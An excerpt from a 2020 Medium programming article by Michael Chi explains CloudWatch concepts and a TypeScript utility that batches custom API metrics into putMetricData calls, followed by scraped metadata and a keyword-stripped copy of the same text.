Publishing CloudWatch Metrics With the API set up, I want it to send metrics to CloudWatch so we can use them later. But first, I will quickly go through some basic CloudWatch concepts if you’ve never used them before. If you want to dive more into it, I found this post by Mathew Kenny Thomas, which explains each concept in more detail. CloudWatch is a monitoring service offered by AWS. There are namespaces in CloudWatch that serve as containers for the metrics that we publish. Usually, each application publishes metrics with a unique namespace within an organization. You can think of these metrics as sets of data representing the value of a variable over time. For example, this variable can be the CPU usage of an EC2 instance, and the data points represent the percentage utilization of CPU over time. You can also define your own custom metrics and publish them to CloudWatch, and then you can retrieve statistics about them by creating a dashboard. That’s what we will be doing here. I created a utility class for it: A metric in CloudWatch has dimensions, which are name/value pairs that are part of the identity of a metric. We can associate a maximum of ten dimensions with a metric. On line 34, I added a dimension to indicate the environment of the API, to distinguish testing metrics from production. In addition, a metric has properties like the metric name, the value, and the unit of the data point. This type is defined by the MetricData type on line 3. The _metricsQueue is used to batch metrics together to reduce AWS request calls. Each API call to putMetricData costs money, and we can avoid that cost if we send multiple metrics in one go. Luckily, this method allows us to do that. The parameter of putMetricData is as follows: MetricData.member.N The data for the metric. The array can include no more than 20 metrics per call. This means the MetricData parameter that we pass into putMetricData can be an array of metrics, and each item has the type MetricData. So our class maintains a queue that stores up to ten metrics. When the queue is full, we publish all of them at once with the namespace My API on line 57. We return the promise of the SDK call and let the controller handle the result. This is a very simple implementation of batching, but there is a more powerful library to handle this if you are looking to save some AWS costs. Mixmax made a blog post showing how they saved a decent amount of operating cost by batching up metrics: “Batching CloudWatch metrics.” Now that we have a utility that publishes metrics to CloudWatch, let’s see how we can use it inside a TypeScript decorator.
https://medium.com/better-programming/benchmarking-api-endpoints-with-typescript-decorators-27cd462be488
['Michael Chi']
2020-11-03 19:03:04.318000+00:00
['JavaScript', 'Web Development', 'Typescript', 'AWS', 'Programming']
Title Benchmarking API Endpoints TypeScript DecoratorsContent Publishing CloudWatch Metrics API set want send metric CloudWatch use later first quickly go basic CloudWatch concept you’ve never used want dive found post Mathew Kenny Thomas explains concept detail CloudWatch monitoring service offered AWS namespaces CloudWatch serve container metric publish Usually application publishes metric unique namespace within organization think metric set data representing value variable time example variable CPU usage EC2 instance data point represent percentage utilization CPU time also define custom metric publish CloudWatch retrieve statistic creating dashboard That’s created utility class metric CloudWatch dimension namevalue pair part identity metric associate maximum ten dimension metric line 34 added dimension indicate environment API distinguish testing metric production addition metric property like metric name value unit data point type defined MetricData type line 3 metricsQueue used batch metric together reduce AWS request call API call use putMetricData cost money avoid cost send multiple metric one go Luckily method allows u parameter putMetricData follows MetricDatamemberN data metric array include 20 metric per call mean MetricData parameter pas putMetricData array metric item type MetricData class maintains queue store ten metric queue full publish namespace API line 57 return promise sdk call let controller handle result simple implementation batching powerful library handle looking save AWS cost Mixmax made blogpost showing saved decent amount operating cost batching metric “Batching CloudWatch metrics” utility publishes metric CloudWatch let’s see use inside TypeScript decoratorTags JavaScript Web Development Typescript AWS Programming